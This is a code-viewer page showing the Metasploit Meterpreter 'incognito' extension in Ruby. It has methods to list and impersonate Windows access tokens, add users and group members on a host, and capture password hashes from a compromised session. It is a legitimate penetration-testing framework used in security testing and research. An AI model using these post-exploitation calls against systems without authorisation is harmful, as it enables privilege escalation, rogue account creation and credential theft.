CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
Views: 11791
1
# -*- coding: binary -*-

2


3
require 'rex/post/meterpreter/extensions/incognito/tlv'

4
require 'rex/post/meterpreter/extensions/incognito/command_ids'

5


6
module Rex

7
module Post

8
module Meterpreter

9
module Extensions

10
module Incognito

11


12
###

13
#

14
# This meterpreter extensions a privilege escalation interface that is capable

15
# of doing things like dumping password hashes and performing local

16
# exploitation.

17
#

18
###

19
class Incognito < Extension

20


21
  def self.extension_id

22
    EXTENSION_ID_INCOGNITO

23
  end

24


25
  def initialize(client)

26
    super(client, 'incognito')

27


28
    client.register_extension_aliases(

29
      [

30
        {

31
          'name' => 'incognito',

32
          'ext'  => self

33
        },

34
      ])

35
  end

36


37
  def incognito_list_tokens(token_order)

38
    request = Packet.create_request(COMMAND_ID_INCOGNITO_LIST_TOKENS)

39
    request.add_tlv(TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER, token_order)

40


41
    response = client.send_request(request)

42


43
    {

44
      'delegation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION),

45
      'impersonation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)

46
    }

47
  end

48


49
  def incognito_impersonate_token(username)

50
    request = Packet.create_request(COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN)

51
    request.add_tlv(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, username)

52
    response = client.send_request(request)

53


54
    response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)

55
  end

56


57
  def incognito_add_user(host, username, password)

58
    request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_USER)

59
    request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)

60
    request.add_tlv(TLV_TYPE_INCOGNITO_PASSWORD, password)

61
    request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)

62
    response = client.send_request(request)

63


64
    response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)

65
  end

66


67
  def incognito_add_group_user(host, groupname, username)

68
    request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_GROUP_USER)

69
    request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)

70
    request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)

71
    request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)

72
    response = client.send_request(request)

73


74
    response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)

75
  end

76


77
  def incognito_add_localgroup_user(host, groupname, username)

78
    request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER)

79
    request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)

80
    request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)

81
    request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)

82
    response = client.send_request(request)

83


84
    response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)

85
  end

86


87
  def incognito_snarf_hashes(host)

88
    request = Packet.create_request(COMMAND_ID_INCOGNITO_SNARF_HASHES)

89
    request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)

90
    client.send_request(request)

91


92
    true

93
  end

94


95
end

96


97
end; end; end; end; end

98


99